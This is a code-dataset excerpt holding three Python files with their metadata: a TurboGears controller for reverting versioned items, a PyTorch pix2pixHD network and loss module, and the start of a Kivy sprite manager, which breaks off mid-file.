"text": "from sgp.lib.base import BaseController\nfrom sgp.model import DBSession\nfrom sgp.model.auth import Item,Fase,Atributo\nfrom sgp.managers.ItemMan import ItemManager\nfrom sgp.managers.FaseMan import FaseManager\nfrom sgp.managers.TipoItemMan import TipoItemManager\nfrom sgp.managers.CodigoMan import CodigoManager\nfrom sgp.managers.RelacionMan import RelacionManager\nfrom sgp.managers.LineaBaseMan import LineaBaseManager\nfrom sgp.managers.ProyectoMan import ProyectoManager\nfrom tg import expose, flash, redirect\nfrom tg.decorators import without_trailing_slash, with_trailing_slash\nimport transaction\n\nfrom tgext.crud import CrudRestController\nfrom sprox.tablebase import TableBase\nfrom sprox.fillerbase import TableFiller\nfrom sprox.formbase import AddRecordForm\nfrom sprox.formbase import EditableForm\nfrom sprox.fillerbase import EditFormFiller\n\nfrom tg.decorators import paginate\nimport pylons\nfrom pylons import tmpl_context \nfrom tg import session\n\n\n\nclass ItemTable(TableBase):\n __model__ = Item\n __omit_fields__ = ['id_item','observacion','complejidad','id_fase','id_linea_base','id_tipo_item','descripcion','adjuntos','atributos',]\n __xml_fields__ = ['nombre']\n \nitem_table = ItemTable(DBSession)\n##############################################################################\nclass ItemTableFiller(TableFiller):\n __model__ = Item\n \n buscado=\"\"\n def init(self,id_item):\n self.id_item=id_item\n\n\n def _do_get_provider_count_and_objs(self, buscado=\"\", **kw):\n im = ItemManager()\n item = im.getById(self.id_item)\n Campoes = im.getAnteriores(item.codigo, item.id_fase)\n return len(Campoes), Campoes \n\n def __actions__(self, obj):\n \"\"\"Override this function to define how action links should be displayed for the given record.\"\"\"\n primary_fields = self.__provider__.get_primary_fields(self.__entity__)\n pklist = '/'.join(map(lambda x: str(getattr(obj, x)), primary_fields))\n estado = obj.estado\n if estado != 'finalizado':\n #value = '
edit'\n value = 'Revertir' # (HTML anchor/div markup around these action links was lost in extraction; only the labels remain)\n else:\n value = '
'\n return value\n \nitem_table_filler = ItemTableFiller(DBSession)\nclass ItemRevertirController(CrudRestController):\n model = Item\n table = item_table\n table_filler = item_table_filler\n#******************************************************************************************\n def getNavegacionFromIdFase(self, id_fase):\n fm = FaseManager()\n fase = fm.getById(int(id_fase))\n proyecto = ProyectoManager().getById(fase.id_proyecto)\n navegacion = dict(id_fase = fase.id_fase, id_proyecto = fase.id_proyecto, fase = fase.nombre, proyecto=proyecto.nombre, admin_sistema=False)\n return (fase, navegacion)\n#******************************************************************************************\n def getNavegacionFromIdItem(self, id_item):\n item = ItemManager().getById(int(id_item))\n fase = FaseManager().getById(item.id_fase)\n proyecto = ProyectoManager().getById(fase.id_proyecto)\n navegacion = dict(id_fase = fase.id_fase, id_proyecto = fase.id_proyecto, fase = fase.nombre, proyecto=proyecto.nombre,admin_sistema=False)\n# print \"Navegacion\", navegacion\n return (item,navegacion)\n#******************************************************************************************\n#****************************************************************************************** \n @with_trailing_slash\n #@expose('sgp.templates.get_all_item')\n @expose('sgp.templates.item_revertir')\n @expose('json')\n @paginate('value_list', items_per_page=7)\n def get_all(self, *args, **kw):\n params = kw\n busqueda_filler = ItemTableFiller(DBSession)\n busqueda_filler.init(params[\"id_item\"])\n \n tmpl_context.widget = self.table\n value = busqueda_filler.get_value(**kw)\n item, navegacion = self.getNavegacionFromIdItem(params['id_item'])\n return dict(value_list=value, model=\"Item\", id_item = params['id_item'], navegacion=navegacion)\n \n#****************************************************************************************** \n @expose()\n def revertir(self,*args,**kw):\n id_item = kw[\"id_item\"]\n id_item = int(id_item)\n im = ItemManager()\n transaction.begin()\n item_revertir = im.getById(id_item)\n item_nuevo = Item()\n \n '''Copiar los campos'''\n item_nuevo.codigo = item_revertir.codigo\n item_nuevo.identificador = item_revertir.identificador\n item_nuevo.observacion = item_revertir.observacion\n item_nuevo.estado = 'revision'\n item_nuevo.complejidad = item_revertir.complejidad\n item_nuevo.id_fase = item_revertir.id_fase\n item_nuevo.id_tipo_item = item_revertir.id_tipo_item\n item_nuevo.descripcion = item_revertir.descripcion\n items_de_fase = im.buscar_por_fase(item_revertir.id_fase)\n id_fase = item_revertir.id_fase\n item_nuevo.id_linea_base = item_revertir.id_linea_base\n# item_revertir.id_linea_base = None\n version = 0\n# '''Estado del item revertido'''\n# if item_revertir.estado == 'aprobado':\n# item_nuevo.estado = 'listo' \n# else:\n# item_nuevo.estado = item_revertir.estado\n \n for item in items_de_fase:\n if item.version > version:\n version = item.version\n if item.codigo == item_revertir.codigo and item.actual == \"true\": \n item.actual = \"false\"\n version = version + 1\n item_nuevo.version = version\n item_nuevo.actual = 'true'\n \n im.add(item_nuevo)\n transaction.commit()\n \n item_viejo = im.getById(id_item)\n identificador = item_viejo.identificador\n \n tipo_item = item_viejo.id_tipo_item\n if tipo_item :\n for atributo in item_viejo.atributos:\n id_campo = atributo.id_campo\n valor = atributo.valor\n im.addAtributo(identificador,id_fase,version,id_campo,valor) \n 
im.update(item_viejo)\n transaction.begin()\n item_viejo = im.getById(id_item)\n item = im.getByIdentificadorFaseVersion(identificador,id_fase,version) #Item_nuevo\n '''Copiar los adjuntos'''\n if item_viejo.adjuntos :\n for adjunto in item_viejo.adjuntos:\n im.copiarAdjunto(item,adjunto)\n im.update(item)\n \n '''Recuperar Relaciones'''\n rm = RelacionManager()\n item = im.getByIdentificadorFaseVersion(identificador,id_fase,version) #Item_nuevo\n relaciones = rm.getByItem(item_viejo.id_item)\n id_item_nuevo = item.id_item\n for relacion in relaciones:\n transaction.begin()\n if relacion.id_item1 == item_viejo.id_item:\n item1 = item\n item2 = im.getById(relacion.id_item2)\n else:\n item1 = im.getById(relacion.id_item1)\n item2 = item\n \n if item1.actual == 'true' and item2.actual == 'true':\n if item1.id_fase == item2.id_fase : #son items de la misma fase\n if not rm.tieneciclos(item1, item2):#no tiene ciclos\n rm.add(item1,item2,'padre-hijo') \n else:\n rm.add(item1,item2,'antecesor-sucesor')\n transaction.commit()\n \n '''Marcar Para revision Item Relacionados'''\n lbm = LineaBaseManager()\n relaciones = rm.getByItem(id_item_nuevo)\n for relacion in relaciones:\n transaction.begin()\n if relacion.id_item1 == id_item_nuevo:\n item_revision = im.getById(relacion.id_item2)\n else:\n item_revision = im.getById(relacion.id_item1)\n \n item_revision.estado = 'revision'\n if item_revision.id_linea_base != None:\n linea_base = lbm.getById(item_revision.id_linea_base)\n linea_base.estado = 'no valido'\n lbm.update(linea_base)\n transaction.commit()\n \n transaction.commit()\n raise redirect('/item/items?id_fase='+ str(id_fase))\n \n ", "sub_path": "SGP/src/SGP/sgp/controllers/itemRevertir.py", "file_name": "itemRevertir.py", "file_ext": "py", "file_size_in_byte": 8720, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sprox.tablebase.TableBase", "line_number": 29, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 30, "usage_type": "name"}, {"api_name": "sgp.model.DBSession", "line_number": 34, "usage_type": "argument"}, {"api_name": "sprox.fillerbase.TableFiller", "line_number": 36, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 37, "usage_type": "name"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 45, "usage_type": "call"}, {"api_name": "sgp.model.DBSession", "line_number": 71, "usage_type": "argument"}, {"api_name": "tgext.crud.CrudRestController", "line_number": 72, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 73, "usage_type": "name"}, {"api_name": "sgp.managers.FaseMan.FaseManager", "line_number": 78, "usage_type": "call"}, {"api_name": "sgp.managers.ProyectoMan.ProyectoManager", "line_number": 80, "usage_type": "call"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 85, "usage_type": "call"}, {"api_name": "sgp.managers.FaseMan.FaseManager", "line_number": 86, "usage_type": "call"}, {"api_name": "sgp.managers.ProyectoMan.ProyectoManager", "line_number": 87, "usage_type": "call"}, {"api_name": "sgp.model.DBSession", "line_number": 100, "usage_type": "argument"}, {"api_name": "pylons.tmpl_context.widget", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pylons.tmpl_context", "line_number": 103, "usage_type": "name"}, {"api_name": "tg.decorators.with_trailing_slash", "line_number": 93, "usage_type": "name"}, {"api_name": "tg.expose", "line_number": 95, "usage_type": "call"}, {"api_name": 
"tg.expose", "line_number": 96, "usage_type": "call"}, {"api_name": "tg.decorators.paginate", "line_number": 97, "usage_type": "call"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 113, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 114, "usage_type": "call"}, {"api_name": "sgp.model.auth.Item", "line_number": 116, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 148, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 160, "usage_type": "call"}, {"api_name": "sgp.managers.RelacionMan.RelacionManager", "line_number": 170, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 175, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 189, "usage_type": "call"}, {"api_name": "sgp.managers.LineaBaseMan.LineaBaseManager", "line_number": 192, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 195, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 206, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 208, "usage_type": "call"}, {"api_name": "tg.redirect", "line_number": 209, "usage_type": "call"}, {"api_name": "tg.expose", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "366950025", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom functools import partial\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, 0.0, 0.02)\n if m.bias is not None :\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.normal_(m.weight, 1.0, 0.02)\n if m.bias is not None :\n nn.init.zeros_(m.bias)\n\ndef get_norm_layer(type_norm='none'):\n if type_norm == 'batch' :\n norm = partial(nn.BatchNorm2d, momentum=0.9, affine=True, eps=1.01e-5)\n elif type_norm == 'instance' :\n norm = partial(nn.InstanceNorm2d, momentum=0.9, affine=False, eps=1.01e-5)\n elif type_norm == 'none' :\n norm = nn.Identity\n else :\n raise NotImplementedError('%s: invalid normalization type'%(type_norm))\n return norm\n\nclass ResidualBlock(nn.Module):\n def __init__(self, nb_feat, norm):\n super(ResidualBlock, self).__init__()\n\n self.build(nb_feat, norm)\n\n def build(self, nb_feat, norm):\n block = [nn.ReflectionPad2d(1),\n nn.Conv2d(nb_feat, nb_feat, kernel_size=3, stride=1, padding=0),\n norm(nb_feat), nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(nb_feat, nb_feat, kernel_size=3, stride=1, padding=0),\n norm(nb_feat)]\n self.block = nn.Sequential(*block)\n\n def forward(self, inp):\n return inp + self.block(inp)\n\nclass ResidualGenerator(nn.Module):\n def __init__(self, opt):\n super(ResidualGenerator, self).__init__()\n\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_G\n norm = get_norm_layer(self.opt.type_norm)\n act = nn.ReLU()\n\n block = []\n block += [nn.ReflectionPad2d(3),\n nn.Conv2d(self.opt.ch_inp, nb_feat, kernel_size=7, stride=1, padding=0),\n norm(nb_feat), act]\n\n for i in range(self.opt.nb_down_G):\n block += [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=3, stride=2, padding=1),\n norm(nb_feat*2), act]\n nb_feat *= 2\n\n for j in range(self.opt.nb_block_G):\n block += [ResidualBlock(nb_feat, norm)]\n\n for k in range(self.opt.nb_down_G):\n block += [nn.ConvTranspose2d(nb_feat, nb_feat//2, kernel_size=3, stride=2, padding=1, output_padding=1),\n norm(nb_feat//2), act]\n nb_feat //=2\n\n block += [nn.ReflectionPad2d(3),\n nn.Conv2d(nb_feat, self.opt.ch_tar, kernel_size=7, stride=1, padding=0)]\n\n 
if self.opt.use_tanh :\n block += [nn.Tanh()]\n \n self.block = nn.Sequential(*block)\n print(self)\n\n def forward(self, inp):\n return self.block(inp)\n\nclass PixelDiscriminator(nn.Module):\n def __init__(self, opt):\n super(PixelDiscriminator, self).__init__()\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_D\n norm = get_norm_layer(self.opt.type_norm)\n\n block = [nn.Conv2d(self.opt.ch_inp+self.opt.ch_tar, nb_feat, kernel_size=1, stride=1, padding=0),\n nn.LeakyReLU(0.2),\n nn.Conv2d(nb_feat, nb_feat*2, kernel_size=1, stride=1, padding=0),\n norm(nb_feat*2), nn.LeakyReLU(0.2),\n nn.Conv2d(nb_feat*2, 1, kernel_size=1, stride=1, padding=0)]\n if self.opt.use_sigmoid :\n block += [nn.Sigmoid()]\n self.block = nn.Sequential(*block)\n\n def forward(self, inp):\n return self.block(inp)\n\nclass PatchDiscriminator(nn.Module):\n def __init__(self, opt):\n super(PatchDiscriminator, self).__init__()\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_D\n norm = get_norm_layer(self.opt.type_norm)\n \n blocks = []\n block = [nn.Conv2d(self.opt.ch_inp+self.opt.ch_tar, nb_feat, kernel_size=4, stride=2, padding=1),\n nn.LeakyReLU(0.2)]\n blocks.append(block)\n\n for n in range(1, self.opt.nb_layer_D):\n block = [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=4, stride=2, padding=1),\n norm(nb_feat*2), nn.LeakyReLU(0.2)]\n blocks.append(block)\n nb_feat *= 2\n\n block = [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=4, stride=1, padding=1),\n norm(nb_feat*2), nn.LeakyReLU(0.2)]\n blocks.append(block)\n nb_feat *= 2\n\n block = [nn.Conv2d(nb_feat, 1, kernel_size=4, stride=1, padding=1)]\n if self.opt.use_sigmoid :\n block += [nn.Sigmoid()]\n blocks.append(block)\n\n self.nb_blocks = len(blocks)\n for i in range(self.nb_blocks):\n setattr(self, 'block_%d'%(i), nn.Sequential(*blocks[i]))\n\n def forward(self, inp):\n result = [inp]\n for n in range(self.nb_blocks):\n block = getattr(self, 'block_%d'%(n))\n result.append(block(result[-1]))\n return result[1:]\n\nclass MultiPatchDiscriminator(nn.Module):\n def __init__(self, opt):\n super(MultiPatchDiscriminator, self).__init__()\n self.nb_D = opt.nb_D\n for n in range(opt.nb_D):\n setattr(self, 'Discriminator_%d'%(n), PatchDiscriminator(opt))\n self.downsample = nn.AvgPool2d(kernel_size=3, padding=1, stride=2)\n def forward(self, inp):\n result = []\n for n in range(self.nb_D):\n if n != 0 :\n inp = self.downsample(inp)\n result.append(getattr(self, 'Discriminator_%d'%(n))(inp))\n return result\n\nclass Loss:\n def __init__(self, opt, device):\n\n self.device = device\n self.nb_D = opt.nb_D\n self.weight_FM_loss = opt.weight_FM_loss\n\n if opt.type_gan == 'gan' :\n self.criterion = nn.BCELoss().to(self.device)\n elif opt.type_gan == 'lsgan' :\n self.criterion = nn.MSELoss().to(self.device)\n\n self.FMcriterion = nn.L1Loss().to(self.device)\n\n def __call__(self, network_D, network_G, inp, tar):\n loss_D = 0\n loss_G_fake = 0\n loss_G_FM = 0\n\n gen = network_G(inp)\n\n outputs_D_real = network_D(torch.cat([inp, tar], 1))\n outputs_D_fake = network_D(torch.cat([inp, gen.detach()], 1))\n\n for n in range(self.nb_D):\n output_D_real = outputs_D_real[n][-1]\n output_D_fake = outputs_D_fake[n][-1]\n target_D_real = torch.ones_like(output_D_real, dtype=torch.float).to(self.device)\n target_D_fake = torch.zeros_like(output_D_fake, dtype=torch.float).to(self.device)\n loss_D_real = self.criterion(output_D_real, target_D_real)\n loss_D_fake = 
self.criterion(output_D_fake, target_D_fake)\n loss_D += (loss_D_real+loss_D_fake)/2.\n\n outputs_G_fake = network_D(torch.cat([inp, gen], 1))\n for n in range(self.nb_D):\n output_G_fake = outputs_G_fake[n][-1]\n target_G_fake = torch.ones_like(output_G_fake, dtype=torch.float).to(self.device)\n loss_G_fake += self.criterion(output_G_fake, target_G_fake)\n\n features_real = outputs_D_real[n][:-1]\n features_fake = outputs_G_fake[n][:-1]\n for m in range(len(features_real)):\n loss_G_FM += self.FMcriterion(features_fake[m], features_real[m].detach())* self.weight_FM_loss\n\n loss_D *= (1./self.nb_D)\n loss_G_fake *= (1./self.nb_D)\n loss_G_FM *= (1./self.nb_D)\n\n return gen, loss_D, loss_G_fake, loss_G_FM\n\n\nif __name__ == '__main__' :\n from option import TrainOption\n opt = TrainOption().parse()\n network_D = MultiPatchDiscriminator(opt)\n network_G = ResidualGenerator(opt)\n\n inp = torch.ones((opt.batch_size, opt.ch_inp, opt.height, opt.width))\n tar = torch.ones((opt.batch_size, opt.ch_tar, opt.height, opt.width))\n\n print(inp.shape, tar.shape)\n\n device = torch.device('cpu')\n loss = Loss(opt, device)\n gen, loss_D, loss_G_fake, loss_G_FM = loss(network_D, network_G, inp, tar)\n print(loss_D, loss_G_fake, loss_G_FM)\n\n\n\n", "sub_path": "pytorch/pix2pixhd/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 8219, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.InstanceNorm2d", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, 
"usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 196, "usage_type": "attribute"}, {"api_name": "torch.zeros_like", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 197, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 205, "usage_type": "attribute"}, {"api_name": "option.TrainOption", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "428869818", "text": "import Utility as Util\nfrom Utility import *\nimport math\nfrom kivy.graphics import Scale, Rotate, PushMatrix, PopMatrix, Translate, \\\n UpdateNormalMatrix\n\n#---------------------#\n# Global instance\n#---------------------#\ndef setGlobalInstance():\n global gSpriteMgr\n gSpriteMgr = SpriteMgr.instance()\n \n#---------------------#\n# CLASS : SpriteMgr\n#---------------------#\nclass SpriteMgr(Widget, Singleton, object):\n def __init__(self):\n Widget.__init__(self)\n self.spriteList = []\n Util.MyRoot.instance().regist(self)\n \n def reset(self):\n for sprite in self.spriteList:\n if 
sprite.parent:\n sprite.parent.remove_widget(sprite)\n self.spriteList = [] \n \n def regist(self, sprite):\n if sprite not in self.spriteList:\n self.spriteList.append(sprite) \n \n def remove(self, sprite):\n if sprite in self.spriteList:\n if sprite.parent:\n sprite.parent.remove_widget(sprite)\n self.spriteList.remove(sprite) # list.remove() deletes by value; pop() expects an index\n \n def update(self, dt):\n for sprite in self.spriteList:\n if sprite.parent:\n sprite.update(dt)\n\n#---------------------#\n# CLASS : Sprite\n#---------------------#\nclass Sprite(Widget, object):\n def __init__(self, pos=cXY, size=(100.0, 100.0), **kargs):\n Widget.__init__(self, pos=pos, size=size)\n self.box = None\n self.oldPos = None\n self.boxPos = None\n self.boxRot = None\n self.boxScale = None\n self.color = Color(1,1,1,1)\n self.source = None\n self.texture = None\n self.collision = False\n self.collisionSpace = (0.0, 0.0, Util.W, Util.H)\n self.elastin = 0.3\n self.friction = 0.8\n self.gravity = 0.0\n self.vel = [0.0, 0.0]\n self.rotate = 0.0\n self.rotateVel = 0.0\n self.scaling = 1.0\n self.radius = 0\n self.opacity = 1.0\n self.offset = (0.0, 0.0)\n self.realSize = (0,0)\n self.isGround = False\n self.isTouched = False\n self.isAttached = False\n self.touchable = True\n self.throwable = True\n self.touchOffset = (0,0)\n self.updateRotation = True\n self.updateTranslate = True\n self.attachOffsetList = {}\n \n # set attributes from keyword arguments\n for key in kargs:\n if not hasattr(self, key):\n raise AttributeError(self.__class__.__name__ + \" not found \" + key)\n setattr(self, key, kargs[key])\n # vel may be a tuple; convert it to a list\n self.vel = list(self.vel)\n \n # clamp\n self.elastin = max(min(self.elastin, 1.0), 0.0)\n \n if self.source != None:\n self.texture = self.source.texture\n \n with self.canvas:\n self.color = self.color\n self.box = Rectangle(texture=self.texture, pos=(0,0), size=self.size)\n with self.canvas.before:\n PushMatrix()\n self.boxPos = Translate(0,0)\n self.boxRot = Rotate(angle=0, axis=(0,0,1), origin=mul(mul(self.size, 0.5), self.scaling))\n self.boxScale = Scale(1,1,1)\n with self.canvas.after:\n PopMatrix()\n \n self.boxPos.x = self.pos[0] + (-self.size[0] * 0.5)\n self.boxPos.y = self.pos[1] + (-self.size[1] * 0.5)\n self.pos = (0,0)\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n self.boxRot.origin = mul(mul(self.size, 0.5), self.scaling)\n self.boxRot.angle = self.rotate\n self.boxScale.xyz = (self.scaling, self.scaling, self.scaling) \n self.realSize = mul(self.size, self.scaling)\n self.radius = math.sqrt((self.realSize[0] * 0.5) ** 2 + (self.realSize[1] * 0.5) ** 2)\n # regist\n gSpriteMgr.regist(self)\n \n def on_touch_down(self, touch):\n if not touch.grab_current and not self.isTouched:\n if self.touchable and not self.isAttached:\n if touch.pos[0] > self.boxPos.x and touch.pos[1] > self.boxPos.y and \\\n touch.pos[0] < self.boxPos.x + self.realSize[0] and touch.pos[1] < self.boxPos.y + self.realSize[1]:\n self.isTouched = True\n self.setVelocity(0,0)\n self.touchOffset = sub((self.boxPos.x, self.boxPos.y), touch.pos)\n self.setUpdateTranslate(False)\n touch.grab_current = self\n \n def on_touch_move(self, touch):\n if touch.grab_current is self:\n self.setPos(*add(touch.pos, self.touchOffset))\n self.updateAttachObjPos()\n \n def on_touch_up(self, touch):\n if touch.grab_current is self:\n self.isTouched = False \n self.setPos(*add(touch.pos, self.touchOffset))\n if touch.time_update > 0 and self.throwable:\n self.setVelocity(*add(self.vel, div((touch.dx, touch.dy), Util.fFrameTime)))\n self.setUpdateTranslate(True)\n 
